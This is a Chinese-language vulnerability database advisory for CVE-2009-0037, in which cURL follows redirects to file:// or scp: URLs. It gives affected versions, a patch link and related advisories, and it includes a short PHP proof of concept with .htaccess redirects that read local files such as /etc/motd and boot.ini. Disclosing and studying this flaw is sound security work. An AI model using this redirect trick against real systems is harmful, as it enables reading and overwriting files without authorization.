Lucene search
RootSSV:4867HistoryMar 05, 2009 - 12:00 a.m.
cURL/libcURL HTTP Location:重新定向绕过安全限制漏洞
2009-03-0500:00:00
Root
www.seebug.org
21
0.008 Low
EPSS
Percentile
78.9%
BUGTRAQ ID: 33962
CVE(CAN) ID: CVE-2009-0037
cURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。
跟随HTTP Location:的cURL会重新定向到scp:或file:// URL,因此如果用户点击了特制的重新定向URL的话(例如libcurl客户端读取RSS源),恶意的HTTP服务器就可以覆盖或泄露任意本地文件系统的内容,或执行任意命令。
Daniel Stenberg curl 5.11 - 7.19.3
厂商补丁:
Daniel Stenberg
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://curl.haxx.se/download/curl-7.19.4.zip” target=“_blank”>http://curl.haxx.se/download/curl-7.19.4.zip</a>
<?php
// This is an example of a vulnerable peice of PHP code
// If libcurl uses CURLOPT_FOLLOWLOCATION it could lead
// to arbitrary file access.
// The malicious redirect on withdk.com looks like this
// in .htaccess:
// # for Linux
// redirect 302 /test file:///etc/motd
// # for Win32
// redirect 302 /test file:///c:\boot.ini
// print_r ( curl_version() );
$c = new cc;
$c->fetch('http://withdk.com/malicious-redirect');
class cc {
function fetch($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$result1 = curl_exec($ch);
echo $result1;
curl_close($ch);
}
}
?>
Related
nessus
nessus
SuSE 10 Security Update : curl (ZYPP Patch Number 6015)
2009-09-24 00:00:00
Fedora 9 : curl-7.19.4-1.fc9 (2009-2265)
2009-03-06 00:00:00
Mandriva Linux Security Advisory : curl (MDVSA-2009:069)
2009-04-23 00:00:00
openvas
openvas
Fedora Core 10 FEDORA-2009-2247 (curl)
2009-03-07 00:00:00
SLES9: Security update for curl
2009-10-10 00:00:00
CentOS Update for curl CESA-2009:0341 centos4 i386
2011-08-09 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 6 package curl version 7.19.4-alt1
2009-03-03 00:00:00
Security fix for the ALT Linux 8 package curl version 7.19.4-alt1
2009-03-03 00:00:00
debiancve
debiancve
CVE-2009-0037
2009-03-05 02:30:00
gentoo
gentoo
cURL: Arbitrary file access
2009-03-09 00:00:00
redhat
redhat
(RHSA-2009:0341) Moderate: curl security update
2009-03-19 00:00:00
prion
prion
Design/Logic Flaw
2009-03-05 02:30:00
fedora
fedora
[SECURITY] Fedora 9 Update: curl-7.19.4-1.fc9
2009-03-05 20:26:29
[SECURITY] Fedora 10 Update: curl-7.19.4-1.fc10
2009-03-05 20:24:48
debian
debian
[SECURITY] [DSA 1738-1] New curl packages fix arbitrary file access
2009-03-11 16:46:54
securityvulns
securityvulns
[USN-726-1] curl vulnerability
2009-03-04 00:00:00
curl protection bypass
2009-03-04 00:00:00
cve
cve
CVE-2009-0037
2009-03-05 02:30:00
centos
centos
curl security update
2009-03-19 16:55:16
curl security update
2009-03-24 04:11:36
ubuntu
ubuntu
curl vulnerability
2009-03-03 00:00:00
veracode
veracode
Arbitrary Code Execution
2020-04-10 00:36:48
ubuntucve
ubuntucve
CVE-2009-0037
2009-03-05 00:00:00
slackware
slackware
curl
2009-03-10 10:26:20
oraclelinux
oraclelinux
curl security update
2009-03-19 00:00:00
freebsd
freebsd
curl -- cURL/libcURL Location: Redirect URLs Security Bypass
2009-03-03 00:00:00
vmware
vmware
ESX Service Console updates for udev, sudo, and curl
2009-07-10 00:00:00
threatpost
threatpost
Apple Mega Patch Covers 88 Mac OS X Vulnerabilities
2010-03-29 17:15:44